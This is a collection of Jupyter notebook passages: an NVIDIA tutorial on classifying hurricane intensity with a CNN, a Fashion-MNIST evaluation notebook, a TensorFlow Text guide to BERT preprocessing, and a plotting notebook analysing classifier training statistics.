import numpy as np
#Generate random number from [0,0] to [23,23] and define start and end points
start_pt= np.random.randint(24,size=2)
end_pt = start_pt + [232,232]
# Scale Image and Take a Random patch from it
img = cv2.resize(img,(256,256))
rand = img[start_pt[0]:end_pt[0],start_pt[1]:end_pt[1]]
plt.imshow(rand)
rand.shape
```
The output Of the final images is obtained as (232, 232, 3)
# Annotating our dataset
Let us start by taking an example of Katrina Hurricane from 2005 and scaling it for all the Cyclones
```
import pandas as pd
# Read the CSV we saved earlier
df = pd.read_csv('atlantic_storms.csv')
# Create a Mask to Filter our Katrina Cyclone (2005)
mask = (df['date'] > '2005-01-01') & (df['date'] <= '2006-01-01') & ( df['name'] == 'KATRINA')
# Apply the Mask to the Original Data Frame and Extract the new Dataframe
new_df = df.loc[mask]
new_df
#Getting the list of Images from Our Dataset for Katrina
import os
e = os.listdir('Dataset/tcdat/tc05/ATL/12L.KATRINA/ir/geo/1km')
e.sort()
#Show First five images
e[:5]
```
#### We can observe, the images are taken once 30 minutes, but the text data is available once every 6 hours. So we will be interpolating the text data to fit the curve
```
#Get list of Dates and Velocity from the New Dataframe
date_list = new_df['date'].tolist()
velocity_list = new_df['maximum_sustained_wind_knots'].tolist()
print(date_list[:5])
type(date_list[0])
```
The Dates are in STR Format which we will be converting now to datetime format to work with.
```
from datetime import datetime
# Get and Convert to Datetime format for the First Last recorded time of Text Data.
first = (datetime.strptime(date_list[0], "%Y-%m-%d %H:%M:%S"))
last = (datetime.strptime(date_list[-1], "%Y-%m-%d %H:%M:%S"))
print(first)
type(first)
#Changes the list from Convert everything to seconds from the first image to interpolate the data
for i in range(len(date_list)):
date_list[i]=( (datetime.strptime(date_list[i], "%Y-%m-%d %H:%M:%S")) - first ).total_seconds()
print(date_list[i])
# Interpolate using the Scipy Library Funciton
from scipy import interpolate
func = interpolate.splrep(date_list,velocity_list)
#Getting List of Katrina Images
import os
e = os.listdir('Dataset/tcdat/tc05/ATL/12L.KATRINA/ir/geo/1km')
# Sort images by time
e.sort()
x=[]
y=[]
for m in e :
try :
#Strip the Time Data from image and convert it the a datetime type.
time_img=(datetime.strptime(m[:13], "%Y%m%d.%H%M"))
# If the Image is taken between the available text data
if(time_img>=first and time_img <= last):
# Get Interpolated Value for that time and Save It
value = int(interpolate.splev((time_img-first).total_seconds(),func))
x.append((time_img-first).total_seconds())
y.append(value)
except :
pass
import matplotlib.pyplot as plt
# Plot All the Saved Data Points
f = plt.figure(figsize=(24,10))
ax = f.add_subplot(121)
ax2 = f.add_subplot(122)
ax.title.set_text('Datapoints frm csv file')
ax2.title.set_text('Interpolated from CSV file to images')
ax.plot(date_list,velocity_list,'-o')
ax2.plot(x,y)
```
### Now we have interpolated and found relevant velocity for all images between the recorded text timeframe. Let us now use it for training our Model.
# Wrapping Things Up :
### Preparing the Dataset
##### All the above modules are joined together and make It into a single function to load data
```
import sys
sys.path.append('/workspace/python/source_code')
# Import Utlility functions
from utils import *
# Load dataset
filenames,labels = load_dataset()
val_filenames , val_labels = make_test_set(filenames,labels,val=0.1)
```
# Understand our dataset :
We can see the following lines from the Output :
`[344, 344, 344, 344, 344, 344, 344, 344]` and `{2: 7936, 3: 5339, 1: 3803, 4: 2934, 5: 2336, 6: 2178, 7: 204, 0: 100}`
This is the distribution of our validation set and training set over it's classes.
For the validation set we use *Stratified Validation* set so that our validation set nearly respresent the whole class.
```
#Make train test set
test = 0.2
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(filenames, labels, test_size=test, random_state=1)
```
# One-Hot Encoding
`y_train` is a list containing data from 0-7 such as [ 2,4,5,....] but our Model Needs an Input of Array for Each Output as as 1D vector :
2 --- > [ 0 , 0 , 1 , 0 , 0 , 0 , 0 , 0]
4 --- > [ 0 , 0 , 0 , 0 , 1 , 0 , 0 , 0]
This is encoded as such because keeping the other values 0 is necessary for the model to find the model Loss and use backpropagation for making it learn the _Weight Matrix_.
The below given image is an example of One-Hot Encoding :

Reference : [What is One Hot Encoding and How to Do It](https://medium.com/@michaeldelsole/what-is-one-hot-encoding-and-how-to-do-it-f0ae272f1179)
```
import tensorflow as tf
y_train = tf.one_hot(y_train,depth=8)
y_test = tf.one_hot(y_test,depth=8)
val_labels = tf.one_hot(val_labels,depth=8)
train,test,val = make_dataset((x_train,y_train,128),(x_test,y_test,32),(val_filenames,val_labels,32))
```
### Defining our Model

We will be Implementing this model in Keras using the following code
```
import numpy as np
import os
os.environ["CUDA_VISIBLE_DEVICES"]="0"
tf.random.set_seed(1337)
import tensorflow.keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv2D, Flatten ,Dropout, MaxPooling2D
from tensorflow.keras import backend as K
#Reset Graphs and Create Sequential model
K.clear_session()
model = Sequential()
#Convolution Layers
model.add(Conv2D(64, kernel_size=10,strides=3, activation='relu', input_shape=(232,232,3)))
model.add(MaxPooling2D(pool_size=(3, 3),strides=2))
model.add(Conv2D(256, kernel_size=5,strides=1,activation='relu'))
model.add(MaxPooling2D(pool_size=(3, 3),strides=2))
model.add(Conv2D(288, kernel_size=3,strides=1,padding='same',activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2),strides=1))
model.add(Conv2D(272, kernel_size=3,strides=1,padding='same',activation='relu'))
model.add(Conv2D(256, kernel_size=3,strides=1,activation='relu'))
model.add(MaxPooling2D(pool_size=(3, 3),strides=2))
model.add(Dropout(0.5))
model.add(Flatten())
#Linear Layers
model.add(Dense(3584,activation='relu'))
model.add(Dense(2048,activation='relu'))
model.add(Dense(8, activation='softmax'))
# Print Model Summary
model.summary()
```
### Compiling and Training our Model
We will be using the following :
- Optimizer : SGD ( Stochastic Gradient Descent ) with parameters mentioned in the research paper.
- Learning Rate : 0.001
- Momentum : 0.9
- Loss Function : Categorical Cross Entropy ( Used in Multi-class classification )
- Metrics : We will be using two metrics to determine how our model performs
- Accuracy : Number of Predictions correct / Total number of Predictions
- Top -2 Accuracy : Top-2 accuracy means that any of your model 2 highest probability answers must match the expected answer.
```
import functools
# Include Top-2 Accuracy Metrics
top2_acc = functools.partial(tensorflow.keras.metrics.top_k_categorical_accuracy, k=2)
top2_acc.__name__ = 'top2_acc'
#Define Number of Epochs
epochs = 4
#But Training our model from scratch will take a long time
#So we will load a partially trained model to speedup the process
model.load_weights("trained_16.h5")
# Optimizer
sgd = tensorflow.keras.optimizers.SGD(lr=0.001, decay=1e-6, momentum=0.9)
#Compile Model with Loss Function , Optimizer and Metrics
model.compile(loss=tensorflow.keras.losses.categorical_crossentropy,
optimizer=sgd,
metrics=['accuracy',top2_acc])
# Train the Model
trained_model = model.fit(train,
epochs=epochs,
verbose=1,
validation_data=val)
# Test Model Aganist Validation Set
score = model.evaluate(test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
```
### Visualisations
Let us now visualise how our model perfromed during the training process :
```
import matplotlib.pyplot as plt
f = plt.figure(figsize=(15,5))
ax = f.add_subplot(121)
ax.plot(trained_model.history['accuracy'])
ax.plot(trained_model.history['val_accuracy'])
ax.set_title('Model Accuracy')
ax.set_ylabel('Accuracy')
ax.set_xlabel('Epoch')
ax.legend(['Train', 'Val'])
ax2 = f.add_subplot(122)
ax2.plot(trained_model.history['loss'])
ax2.plot(trained_model.history['val_loss'])
ax2.set_title('Model Loss')
ax2.set_ylabel('Loss')
ax2.set_xlabel('Epoch')
ax2.legend(['Train', 'Val'],loc= 'upper left')
plt.show()
```
## Confusion Matrix :
A confusion matrix is a table that is often used to describe the performance of a classification model (or "classifier") on a set of test data for which the true values are known.
Here , the rows display the predicted class and the columns are the truth value of the classes.From this we can estimate how our model performs over different classes which would in turn help us determine how our data should be fed into our model.
```
import seaborn as sn
from sklearn.metrics import confusion_matrix
import pandas as pd
#Plotting a heatmap using the confusion matrix
pred = model.predict(val)
p = np.argmax(pred, axis=1)
y_valid = np.argmax(val_labels, axis=1, out=None)
results = confusion_matrix(y_valid, p)
classes=['NC','TD','TC','H1','H3','H3','H4','H5']
df_cm = pd.DataFrame(results, index = [i for i in classes], columns = [i for i in classes])
plt.figure(figsize = (15,15))
sn.heatmap(df_cm, annot=True, cmap="Blues")
```
### Congralutions on running your first model. Now In the next notebook , let us try to understand the drawbacks of this model and make it better :
We can notice that the validation accuracy is lesser than the training accuracy. This is because the model is not properly Regularized and the possible reasons are :
**Not enough data-points / Imbalanced classes**
Using different techniques we will be regulating and normalising the model in the upcoming notebook.
## Important:
<mark>Shutdown the kernel before clicking on “Next Notebook” to free up the GPU memory.</mark>
## Licensing
This material is released by NVIDIA Corporation under the Creative Commons Attribution 4.0 International (CC BY 4.0)
[Previous Notebook](Approach_to_the_Problem_&_Inspecting_and_Cleaning_the_Required_Data.ipynb)
     
     
     
     
[1](The_Problem_Statement.ipynb)
[2](Approach_to_the_Problem_&_Inspecting_and_Cleaning_the_Required_Data.ipynb)
[3]
[4](Countering_Data_Imbalance.ipynb)
[5](Competition.ipynb)
     
     
     
     
[Next Notebook](Countering_Data_Imbalance.ipynb)
     
     
     
     
     
   
[Home Page](../Start_Here.ipynb)
| github_jupyter |
```
# Helper libraries
import numpy as np
import matplotlib.pyplot as plt
# TensorFlow and tf.keras
import tensorflow as tf
from tensorflow import keras
```
### Train
More on model saving: https://www.tensorflow.org/alpha/guide/keras/saving_and_serializing
```
# %run 102_mnist_fashion.py --output outputs/102_mnist_fashion.h5 --epochs 10 --verbose 1
```
### Explore Data
```
fashion_mnist = keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
plt.figure()
plt.imshow(train_images[0])
plt.colorbar()
plt.grid(False)
plt.show()
train_images = train_images / 255.0
test_images = test_images / 255.0
plt.figure(figsize=(10,10))
for i in range(25):
plt.subplot(5,5,i+1)
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow(train_images[i], cmap=plt.cm.binary)
plt.xlabel(class_names[train_labels[i]])
plt.show()
```
### Evaluate Model
```
model = keras.models.load_model('outputs/102_mnist_fashion.h5')
# fix error: "OMP: Error #15: Initializing libiomp5.dylib, but found libiomp5.dylib already initialized."
import os
os.environ['KMP_DUPLICATE_LIB_OK']='True'
predictions = model.predict(test_images)
def plot_image(i, predictions_array, true_label, img):
predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
plt.imshow(img, cmap=plt.cm.binary)
predicted_label = np.argmax(predictions_array)
if predicted_label == true_label:
color = 'blue'
else:
color = 'red'
plt.xlabel("{} {:2.0f}% ({})".format(class_names[predicted_label],
100*np.max(predictions_array),
class_names[true_label]),
color=color)
def plot_value_array(i, predictions_array, true_label):
predictions_array, true_label = predictions_array[i], true_label[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
thisplot = plt.bar(range(10), predictions_array, color="#777777")
plt.ylim([0, 1])
predicted_label = np.argmax(predictions_array)
thisplot[predicted_label].set_color('red')
thisplot[true_label].set_color('blue')
i = 0
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
plt.show()
i = 12
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
plt.show()
# Plot the first X test images, their predicted label, and the true label
# Color correct predictions in blue, incorrect predictions in red
num_rows = 5
num_cols = 3
num_images = num_rows*num_cols
plt.figure(figsize=(2*2*num_cols, 2*num_rows))
for i in range(num_images):
plt.subplot(num_rows, 2*num_cols, 2*i+1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(num_rows, 2*num_cols, 2*i+2)
plot_value_array(i, predictions, test_labels)
plt.show()
# Grab an image from the test dataset
img = test_images[0]
# Add the image to a batch where it's the only member.
img = (np.expand_dims(img, 0))
predictions_single = model.predict(img)
print(predictions_single)
plot_value_array(0, predictions_single, test_labels)
_ = plt.xticks(range(10), class_names, rotation=45)
```
| github_jupyter |
##### Copyright 2021 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# BERT Preprocessing with TF Text
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/text/guide/bert_preprocessing_guide"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/text/blob/master/docs/guide/bert_preprocessing_guide.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/text/blob/master/docs/guide/bert_preprocessing_guide.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View on GitHub</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/text/docs/guide/bert_preprocessing_guide.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
</td>
</table>
## Overview
Text preprocessing is the end-to-end transformation of raw text into a model’s integer inputs. NLP models are often accompanied by several hundreds (if not thousands) of lines of Python code for preprocessing text. Text preprocessing is often a challenge for models because:
* **Training-serving skew.** It becomes increasingly difficult to ensure that the preprocessing logic of the model's inputs are consistent at all stages of model development (e.g. pretraining, fine-tuning, evaluation, inference).
Using different hyperparameters, tokenization, string preprocessing algorithms or simply packaging model inputs inconsistently at different stages could yield hard-to-debug and disastrous effects to the model.
* **Efficiency and flexibility.** While preprocessing can be done offline (e.g. by writing out processed outputs to files on disk and then reconsuming said preprocessed data in the input pipeline), this method incurs an additional file read and write cost. Preprocessing offline is also inconvenient if there are preprocessing decisions that need to happen dynamically. Experimenting with a different option would require regenerating the dataset again.
* **Complex model interface.** Text models are much more understandable when their inputs are pure text. It's hard to understand a model when its inputs require an extra, indirect encoding step. Reducing the preprocessing complexity is especially appreciated for model debugging, serving, and evaluation.
Additionally, simpler model interfaces also make it more convenient to try the model (e.g. inference or training) on different, unexplored datasets.
## Text preprocessing with TF.Text
Using TF.Text's text preprocessing APIs, we can construct a preprocessing
function that can transform a user's text dataset into the model's
integer inputs. Users can package preprocessing directly as part of their model to alleviate the above mentioned problems.
This tutorial will show how to use TF.Text preprocessing ops to transform text data into inputs for the BERT model and inputs for language masking pretraining task described in "Masked LM and Masking Procedure" of [BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding](https://arxiv.org/pdf/1810.04805.pdf). The process involves tokenizing text into subword units, combining sentences, trimming content to a fixed size and extracting labels for the masked language modeling task.
### Setup
Let's import the packages and libraries we need first.
```
!pip install -q -U "tensorflow-text==2.8.*"
import tensorflow as tf
import tensorflow_text as text
import functools
```
Our data contains two text features and we can create a example `tf.data.Dataset`. Our goal is to create a function that we can supply `Dataset.map()` with to be used in training.
```
examples = {
"text_a": [
"Sponge bob Squarepants is an Avenger",
"Marvel Avengers"
],
"text_b": [
"Barack Obama is the President.",
"President is the highest office"
],
}
dataset = tf.data.Dataset.from_tensor_slices(examples)
next(iter(dataset))
```
### Tokenizing
Our first step is to run any string preprocessing and tokenize our dataset. This can be done using the [`text.BertTokenizer`](https://tensorflow.org/text/api_docs/python/text/BertTokenizer), which is a [`text.Splitter`](https://tensorflow.org/text/api_docs/python/text/Splitter) that can tokenize sentences into subwords or wordpieces for the [BERT model](https://github.com/google-research/bert) given a vocabulary generated from the [Wordpiece algorithm](https://www.tensorflow.org/text/guide/subwords_tokenizer#optional_the_algorithm). You can learn more about other subword tokenizers available in TF.Text from [here](https://www.tensorflow.org/text/guide/subwords_tokenizer).
The vocabulary can be from a previously generated BERT checkpoint, or you can generate one yourself on your own data. For the purposes of this example, let's create a toy vocabulary:
```
_VOCAB = [
# Special tokens
b"[UNK]", b"[MASK]", b"[RANDOM]", b"[CLS]", b"[SEP]",
# Suffixes
b"##ack", b"##ama", b"##ger", b"##gers", b"##onge", b"##pants", b"##uare",
b"##vel", b"##ven", b"an", b"A", b"Bar", b"Hates", b"Mar", b"Ob",
b"Patrick", b"President", b"Sp", b"Sq", b"bob", b"box", b"has", b"highest",
b"is", b"office", b"the",
]
_START_TOKEN = _VOCAB.index(b"[CLS]")
_END_TOKEN = _VOCAB.index(b"[SEP]")
_MASK_TOKEN = _VOCAB.index(b"[MASK]")
_RANDOM_TOKEN = _VOCAB.index(b"[RANDOM]")
_UNK_TOKEN = _VOCAB.index(b"[UNK]")
_MAX_SEQ_LEN = 8
_MAX_PREDICTIONS_PER_BATCH = 5
_VOCAB_SIZE = len(_VOCAB)
lookup_table = tf.lookup.StaticVocabularyTable(
tf.lookup.KeyValueTensorInitializer(
keys=_VOCAB,
key_dtype=tf.string,
values=tf.range(
tf.size(_VOCAB, out_type=tf.int64), dtype=tf.int64),
value_dtype=tf.int64
),
num_oov_buckets=1
)
```
Let's construct a [`text.BertTokenizer`](https://tensorflow.org/text/api_docs/python/text/BertTokenizer) using the above vocabulary and tokenize the text inputs into a [`RaggedTensor`](https://www.tensorflow.org/api_docs/python/tf/RaggedTensor).`.
```
bert_tokenizer = text.BertTokenizer(lookup_table, token_out_type=tf.string)
bert_tokenizer.tokenize(examples["text_a"])
bert_tokenizer.tokenize(examples["text_b"])
```
Text output from [`text.BertTokenizer`](https://tensorflow.org/text/api_docs/python/text/BertTokenizer) allows us see how the text is being tokenized, but the model requires integer IDs. We can set the `token_out_type` param to `tf.int64` to obtain integer IDs (which are the indices into the vocabulary).
```
bert_tokenizer = text.BertTokenizer(lookup_table, token_out_type=tf.int64)
segment_a = bert_tokenizer.tokenize(examples["text_a"])
segment_a
segment_b = bert_tokenizer.tokenize(examples["text_b"])
segment_b
```
[`text.BertTokenizer`](https://tensorflow.org/text/api_docs/python/text/BertTokenizer) returns a `RaggedTensor` with shape `[batch, num_tokens, num_wordpieces]`. Because we don't need the extra `num_tokens` dimensions for our current use case, we can merge the last two dimensions to obtain a `RaggedTensor` with shape `[batch, num_wordpieces]`:
```
segment_a = segment_a.merge_dims(-2, -1)
segment_a
segment_b = segment_b.merge_dims(-2, -1)
segment_b
```
### Content Trimming
The main input to BERT is a concatenation of two sentences. However, BERT requires inputs to be in a fixed-size and shape and we may have content which exceed our budget.
We can tackle this by using a [`text.Trimmer`](https://tensorflow.org/text/api_docs/python/text/Trimmer) to trim our content down to a predetermined size (once concatenated along the last axis). There are different `text.Trimmer` types which select content to preserve using different algorithms. [`text.RoundRobinTrimmer`](https://tensorflow.org/text/api_docs/python/text/RoundRobinTrimmer) for example will allocate quota equally for each segment but may trim the ends of sentences. [`text.WaterfallTrimmer`](https://tensorflow.org/text/api_docs/python/text/WaterfallTrimmer) will trim starting from the end of the last sentence.
For our example, we will use `RoundRobinTrimmer` which selects items from each segment in a left-to-right manner.
```
trimmer = text.RoundRobinTrimmer(max_seq_length=_MAX_SEQ_LEN)
trimmed = trimmer.trim([segment_a, segment_b])
trimmed
```
`trimmed` now contains the segments where the number of elements across a batch is 8 elements (when concatenated along axis=-1).
### Combining segments
Now that we have segments trimmed, we can combine them together to get a single `RaggedTensor`. BERT uses special tokens to indicate the beginning (`[CLS]`) and end of a segment (`[SEP]`). We also need a `RaggedTensor` indicating which items in the combined `Tensor` belong to which segment. We can use [`text.combine_segments()`](https://tensorflow.org/text/api_docs/python/text/combine_segments) to get both of these `Tensor` with special tokens inserted.
```
segments_combined, segments_ids = text.combine_segments(
trimmed,
start_of_sequence_id=_START_TOKEN, end_of_segment_id=_END_TOKEN)
segments_combined, segments_ids
```
### Masked Language Model Task
Now that we have our basic inputs, we can begin to extract the inputs needed for the "Masked LM and Masking Procedure" task described in [BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding](https://arxiv.org/pdf/1810.04805.pdf)
The masked language model task has two sub-problems for us to think about: (1) what items to select for masking and (2) what values are they assigned?
#### Item Selection
Because we will choose to select items randomly for masking, we will use a [`text.RandomItemSelector`](https://tensorflow.org/text/api_docs/python/text/RandomItemSelector). `RandomItemSelector` randomly selects items in a batch subject to restrictions given (`max_selections_per_batch`, `selection_rate` and `unselectable_ids`) and returns a boolean mask indicating which items were selected.
```
random_selector = text.RandomItemSelector(
max_selections_per_batch=_MAX_PREDICTIONS_PER_BATCH,
selection_rate=0.2,
unselectable_ids=[_START_TOKEN, _END_TOKEN, _UNK_TOKEN]
)
selected = random_selector.get_selection_mask(
segments_combined, axis=1)
selected
```
#### Choosing the Masked Value
The methodology described the original BERT paper for choosing the value for masking is as follows:
For `mask_token_rate` of the time, replace the item with the `[MASK]` token:
"my dog is hairy" -> "my dog is [MASK]"
For `random_token_rate` of the time, replace the item with a random word:
"my dog is hairy" -> "my dog is apple"
For `1 - mask_token_rate - random_token_rate` of the time, keep the item
unchanged:
"my dog is hairy" -> "my dog is hairy."
[`text.MaskedValuesChooser`](https://tensorflow.org/text/api_docs/python/text/MaskValuesChooser) encapsulates this logic and can be used for our preprocessing function. Here's an example of what `MaskValuesChooser` returns given a `mask_token_rate` of 80% and default `random_token_rate`:
```
mask_values_chooser = text.MaskValuesChooser(_VOCAB_SIZE, _MASK_TOKEN, 0.8)
mask_values_chooser.get_mask_values(segments_combined)
```
When supplied with a `RaggedTensor` input, `text.MaskValuesChooser` returns a `RaggedTensor` of the same shape with either `_MASK_VALUE` (0), a random ID, or the same unchanged id.
#### Generating Inputs for Masked Language Model Task
Now that we have a `RandomItemSelector` to help us select items for masking and `text.MaskValuesChooser` to assign the values, we can use [`text.mask_language_model()`](https://tensorflow.org/text/api_docs/python/text/mask_language_model) to assemble all the inputs of this task for our BERT model.
```
masked_token_ids, masked_pos, masked_lm_ids = text.mask_language_model(
segments_combined,
item_selector=random_selector, mask_values_chooser=mask_values_chooser)
```
Let's dive deeper and examine the outputs of `mask_language_model()`. The output of `masked_token_ids` is:
```
masked_token_ids
```
Remember that our input is encoded using a vocabulary. If we decode `masked_token_ids` using our vocabulary, we get:
```
tf.gather(_VOCAB, masked_token_ids)
```
Notice that some wordpiece tokens have been replaced with either `[MASK]`, `[RANDOM]` or a different ID value. `masked_pos` output gives us the indices (in the respective batch) of the tokens that have been replaced.
```
masked_pos
```
`masked_lm_ids` gives us the original value of the token.
```
masked_lm_ids
```
We can again decode the IDs here to get human readable values.
```
tf.gather(_VOCAB, masked_lm_ids)
```
### Padding Model Inputs
Now that we have all the inputs for our model, the last step in our preprocessing is to package them into fixed 2-dimensional `Tensor`s with padding and also generate a mask `Tensor` indicating the values which are pad values. We can use [`text.pad_model_inputs()`](https://tensorflow.org/text/api_docs/python/text/pad_model_inputs) to help us with this task.
```
# Prepare and pad combined segment inputs
input_word_ids, input_mask = text.pad_model_inputs(
masked_token_ids, max_seq_length=_MAX_SEQ_LEN)
input_type_ids, _ = text.pad_model_inputs(
segments_ids, max_seq_length=_MAX_SEQ_LEN)
# Prepare and pad masking task inputs
masked_lm_positions, masked_lm_weights = text.pad_model_inputs(
masked_pos, max_seq_length=_MAX_PREDICTIONS_PER_BATCH)
masked_lm_ids, _ = text.pad_model_inputs(
masked_lm_ids, max_seq_length=_MAX_PREDICTIONS_PER_BATCH)
model_inputs = {
"input_word_ids": input_word_ids,
"input_mask": input_mask,
"input_type_ids": input_type_ids,
"masked_lm_ids": masked_lm_ids,
"masked_lm_positions": masked_lm_positions,
"masked_lm_weights": masked_lm_weights,
}
model_inputs
```
## Review
Let's review what we have so far and assemble our preprocessing function. Here's what we have:
```
def bert_pretrain_preprocess(vocab_table, features):
# Input is a string Tensor of documents, shape [batch, 1].
text_a = features["text_a"]
text_b = features["text_b"]
# Tokenize segments to shape [num_sentences, (num_words)] each.
tokenizer = text.BertTokenizer(
vocab_table,
token_out_type=tf.int64)
segments = [tokenizer.tokenize(text).merge_dims(
1, -1) for text in (text_a, text_b)]
# Truncate inputs to a maximum length.
trimmer = text.RoundRobinTrimmer(max_seq_length=6)
trimmed_segments = trimmer.trim(segments)
# Combine segments, get segment ids and add special tokens.
segments_combined, segment_ids = text.combine_segments(
trimmed_segments,
start_of_sequence_id=_START_TOKEN,
end_of_segment_id=_END_TOKEN)
# Apply dynamic masking task.
masked_input_ids, masked_lm_positions, masked_lm_ids = (
text.mask_language_model(
segments_combined,
random_selector,
mask_values_chooser,
)
)
# Prepare and pad combined segment inputs
input_word_ids, input_mask = text.pad_model_inputs(
masked_input_ids, max_seq_length=_MAX_SEQ_LEN)
input_type_ids, _ = text.pad_model_inputs(
segment_ids, max_seq_length=_MAX_SEQ_LEN)
# Prepare and pad masking task inputs
masked_lm_positions, masked_lm_weights = text.pad_model_inputs(
masked_lm_positions, max_seq_length=_MAX_PREDICTIONS_PER_BATCH)
masked_lm_ids, _ = text.pad_model_inputs(
masked_lm_ids, max_seq_length=_MAX_PREDICTIONS_PER_BATCH)
model_inputs = {
"input_word_ids": input_word_ids,
"input_mask": input_mask,
"input_type_ids": input_type_ids,
"masked_lm_ids": masked_lm_ids,
"masked_lm_positions": masked_lm_positions,
"masked_lm_weights": masked_lm_weights,
}
return model_inputs
```
We previously constructed a `tf.data.Dataset` and we can now use our assembled preprocessing function `bert_pretrain_preprocess()` in `Dataset.map()`. This allows us to create an input pipeline for transforming our raw string data into integer inputs and feed directly into our model.
```
dataset = (
tf.data.Dataset.from_tensors(examples)
.map(functools.partial(bert_pretrain_preprocess, lookup_table))
)
next(iter(dataset))
```
## Related Tutorials
* [Classify text with BERT](https://www.tensorflow.org/text/tutorials/classify_text_with_bert) - A tutorial on how to use a pretrained BERT model to classify text. This is a nice follow up now that you are familiar with how to preprocess the inputs used by the BERT model.
* [Tokenizing with TF Text](https://www.tensorflow.org/text/guide/tokenizers) - Tutorial detailing the different types of tokenizers that exist in TF.Text.
* [Handling Text with `RaggedTensor`](https://www.tensorflow.org/guide/ragged_tensor) - Detailed guide on how to create, use and manipulate `RaggedTensor`s.
| github_jupyter |
```
from images.scripts_helper import RobotStats
import cPickle as pickle
import matplotlib.pyplot as plt
import matplotlib.pylab as pylab
import matplotlib
import numpy as np
import inspect
from numbers import Number
%matplotlib inline
f = open('/Users/beijbom/Dropbox/dummyfigs/rs3.pkld', 'r')
db = pickle.load(f)
def best_per_source(db, metric):
source_ids = np.unique(map(lambda x: x.source_id, db))
dbnew = []
for source_id in source_ids:
db_sub =[(row) for row in db if row.source_id == source_id]
db_valid =[(row) for row in db_sub if isinstance(getattr(row, metric),(int, np.float32, np.float64))]
if len(db_valid) > 0:
dbnew.append(db_valid[np.argmax(map(lambda row: getattr(row, metric), db_valid))])
return dbnew
def remove_small(db, th):
sizes = np.unique(map(lambda x: x.nsamples_org, db))
return [(row) for row in db if row.nsamples_org > th]
def valid_alleviation(db):
return [(row) for row in db if isinstance(row.allevation_level, (int, np.float32, np.float64))]
(dir(db[0]), len(db))
```
### Look at the various options of nbr samples used in training
```
def train_size_plotter(metric):
yss = [1, 1]
for (itt, field) in enumerate(['target_nbr_samples_final', 'target_nbr_samples_hp']):
ys = []
target_vals = np.unique(map(lambda x: getattr(x, field), db))
for val in target_vals:
db_sub =[(row) for row in db if getattr(row, field) == val]
db_valid =[(row) for row in db_sub if isinstance(getattr(row, metric),(int, np.float32, np.float64))]
ys.append(map(lambda x:(getattr(x, metric)), db_valid))
plt.subplot(1, 2, itt+1)
plt.hist(ys, bins = np.linspace(0, 100, 10), rwidth = 3, histtype = 'barstacked', alpha = .85)
plt.title(metric + " " + field)
plt.legend(target_vals)
yss[itt] = ys
return yss
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
train_size_plotter("allevation_level")
plt.show()
```
### Line & surface plot for accuracy
```
metric = "allevation_level"
target_vals = [2500, 4000, 7500]
bins = np.linspace(-5, 105, 8)
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
colors = ['red', 'green', 'blue']
font = {'size' : 14, 'weight' : 'normal'}
matplotlib.rc('font', **font)
for (itt, val) in enumerate(target_vals):
db_sub =[(row) for row in db if getattr(row, "target_nbr_samples_final") == val]
db_valid =[(row) for row in db_sub if isinstance(getattr(row, metric),(int, np.float32, np.float64))]
ys = map(lambda x:(getattr(x, metric)), db_valid)
vals, a = np.histogram(ys, bins = bins)
vals = np.float32(vals) / sum(vals)
bincenters = 0.5*(bins[1:]+bins[:-1])
plt.plot(bincenters, vals, color = colors[itt], marker = '.', markersize = 10, linewidth = 2)
plt.fill_between(bincenters, vals, color = colors[itt], alpha = .3)
plt.legend(target_vals)
plt.grid(b = 'on', axis='y')
plt.xlabel('Level of alleviation (%)')
plt.ylabel('Pr(x)')
plt.savefig('alleviation_stats_trainsize_breakdown.png', dpi=400)
```
### Accuracy and alleviate plots for the thesis.
```
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
target_vals = [2500, 4000, 7500]
def standard_barplot(db, metric, multiplier):
ys = []
for val in target_vals:
db_sub =[(row) for row in db if row.target_nbr_samples_final == val]
ys.append(map(lambda x:(multiplier*getattr(x, metric)), db_sub))
plt.hist(ys, bins = np.linspace(10,100,10), alpha = .75, histtype='barstacked')
plt.legend(target_vals)
plt.grid(b = 'on', axis='y')
plt.ylabel("Count")
font = {'size' : 14, 'weight' : 'normal'}
matplotlib.rc('font', **font)
plt.subplot(1, 2, 1)
standard_barplot(valid_alleviation(remove_small(db, 5000)), 'funckappa', 100)
plt.text(13, 22, 'A)', fontsize = 24)
